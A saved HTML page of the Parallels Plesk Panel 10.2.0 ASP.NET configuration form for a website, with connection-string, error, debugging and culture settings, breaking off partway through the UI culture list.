<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fshared-ssl%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ASP.NET Configuration for Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/aspdotnet_dom/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function update_oC(f)
{
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

function restore_default_oC(f)
{
   if (!confirm("Restore default ASP.NET settings?"))
       return false;
   f.cmd.value = "restore_default";
   lsubmit(f);
   return false;
}
function custom_errors_status_check(val) {
   if (!chk_uint(val))
       return "Number is invalid.";
   return true;
}
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/aspdotnet/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       
<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-change-version" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Change ASP.NET version used by this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;" style=""><BUTTON name="bname_change-version" id="buttonid-change-version" type="button" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;">Change Version</BUTTON><SPAN id="spanid-change-version">Change Version</SPAN></DIV>
           <DIV class="commonButton" id="bid-restore-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore server default ASP.NET settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_restore_default" id="buttonid-restore-default" type="button" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;">Set to Default</BUTTON><SPAN id="spanid-restore-default">Set to Default</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>


<div class="formArea">


<fieldset>

<legend>Framework Version</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-version">Version</label></td>
           <td>


   2.0.50727.4927<input type="hidden" name="version" value="2.0.50727.4927">








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Connection String Manager</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-conn_strings">Connection strings</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="conn_strings"></div><script>
var conn_strings_columns = new Array();
conn_strings_columns[0] = new Array();
conn_strings_columns[0]['size'] = 30;
conn_strings_columns[0]['name'] = 'conn_string_name';
conn_strings_columns[0]['text'] = 'Name';
conn_strings_columns[0]['type'] = 'text';
conn_strings_columns[0]['editable'] = false;
conn_strings_columns[0]['required'] = true;
conn_strings_columns[0]['primary'] = true;
conn_strings_columns[0]['check'] = null;
conn_strings_columns[1] = new Array();
conn_strings_columns[1]['size'] = 70;
conn_strings_columns[1]['name'] = 'conn_string_value';
conn_strings_columns[1]['text'] = 'Connection Parameters';
conn_strings_columns[1]['type'] = 'text';
conn_strings_columns[1]['editable'] = true;
conn_strings_columns[1]['required'] = true;
conn_strings_columns[1]['primary'] = false;
conn_strings_columns[1]['check'] = null;
var conn_strings_data = new Array();
var conn_strings_can_delete = new Array();
var conn_strings_additional_data = new Array();
conn_strings_data[0] = new Array('LocalSqlServer', 'data source=.\\SQLEXPRESS;Integrated Security=SSPI;AttachDBFilename=|DataDirectory|aspnetdb.mdf;User Instance=true');
conn_strings_can_delete[0] = true;
conn_strings_additional_data[0] = '';
var conn_stringsEditListObj = new psaEditList('conn_strings', true);
conn_stringsEditListObj.setColumns(conn_strings_columns);
conn_stringsEditListObj.setAllData(conn_strings_data, conn_strings_can_delete);
conn_stringsEditListObj.setAllAdditionalData(conn_strings_additional_data);
conn_stringsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
conn_stringsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
conn_stringsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
conn_stringsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
conn_stringsEditListObj.render('conn_strings');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Custom Error Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-custom_err_mode">Custom error mode</label></td>
           <td>



   <select name="custom_err_mode" id="fid-custom_err_mode" >    <option value='On'>On</option>
   <option value='Off'>Off</option>
   <option value='RemoteOnly' SELECTED>RemoteOnly</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-custom_errors">Custom errors</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="custom_errors"></div><script>
var custom_errors_columns = new Array();
custom_errors_columns[0] = new Array();
custom_errors_columns[0]['size'] = 30;
custom_errors_columns[0]['name'] = 'custom_error_status';
custom_errors_columns[0]['text'] = 'Status Code';
custom_errors_columns[0]['type'] = 'text';
custom_errors_columns[0]['editable'] = false;
custom_errors_columns[0]['required'] = true;
custom_errors_columns[0]['primary'] = true;
custom_errors_columns[0]['check'] = custom_errors_status_check;
custom_errors_columns[1] = new Array();
custom_errors_columns[1]['size'] = 70;
custom_errors_columns[1]['name'] = 'custom_error_redirect';
custom_errors_columns[1]['text'] = 'Redirect URL';
custom_errors_columns[1]['type'] = 'text';
custom_errors_columns[1]['editable'] = true;
custom_errors_columns[1]['required'] = true;
custom_errors_columns[1]['primary'] = false;
custom_errors_columns[1]['check'] = null;
var custom_errors_data = new Array();
var custom_errors_can_delete = new Array();
var custom_errors_additional_data = new Array();
var custom_errorsEditListObj = new psaEditList('custom_errors', true);
custom_errorsEditListObj.setColumns(custom_errors_columns);
custom_errorsEditListObj.setAllData(custom_errors_data, custom_errors_can_delete);
custom_errorsEditListObj.setAllAdditionalData(custom_errors_additional_data);
custom_errorsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
custom_errorsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
custom_errorsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
custom_errorsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
custom_errorsEditListObj.render('custom_errors');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Compilation and Debugging</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-def_language">Default web page language</label></td>
           <td>



   <select name="def_language" id="fid-def_language" >    <option value='c#'>c#</option>
   <option value='vb' SELECTED>vb</option>
   <option value='js'>js</option>
   <option value='vj#'>vj#</option>
   <option value='c++'>c++</option>
   <option value='c++7'>c++7</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-debug_mode">Switch on debugging</label></td>
           <td>







   <input type="checkbox" class="checkbox" name="debug_mode" id="fid-debug_mode" value="true" >



           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Globalization Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-req_enc">Request encoding</label></td>
           <td>






   <input type="text" name="req_enc" id="fid-req_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-res_enc">Response encoding</label></td>
           <td>






   <input type="text" name="res_enc" id="fid-res_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-file_enc">File encoding</label></td>
           <td>






   <input type="text" name="file_enc" id="fid-file_enc" value="Windows-1252"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-culture">Culture</label></td>
           <td>



   <select name="culture" id="fid-culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokm..l (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-ui_culture">UI Culture</label></td>
           <td>



   <select name="ui_culture" id="fid-ui_culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
